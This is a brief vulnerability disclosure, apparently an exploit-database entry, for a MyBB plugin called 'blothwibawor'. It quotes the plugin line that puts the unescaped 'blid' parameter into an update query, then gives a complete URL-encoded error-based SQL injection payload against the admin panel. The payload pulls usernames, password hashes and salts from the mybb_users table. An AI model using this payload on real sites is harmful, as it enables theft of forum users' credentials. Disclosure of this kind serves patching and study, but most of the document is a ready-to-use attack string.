Introduction
============
This plugins title describe pretty well what's the plugin does.
No need for more explanations.
SQL Injection
=============
---------------[inc/plugins/blothwibawor.php]--------------
L. 128
1$db->update_query("blothwibawor", $badword_edit,"blid='{$mybb->input['blid']}'");
---------------[inc/plugins/blothwibawor.php]--------------
Proof of Concept
================
Error based injection ; http://[site]/admin/index.php?module=config-blothwibawor&action=save_edit&blid=1%27%20and%20%28select%201%20from%28select%20count%28*%29,concat%28%28select%20concat%28username,%200x3a,%20password,%200x3a,%20salt,%200x3a%29%20from%20mybb_users%20limit%201%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29--%20-
Groucho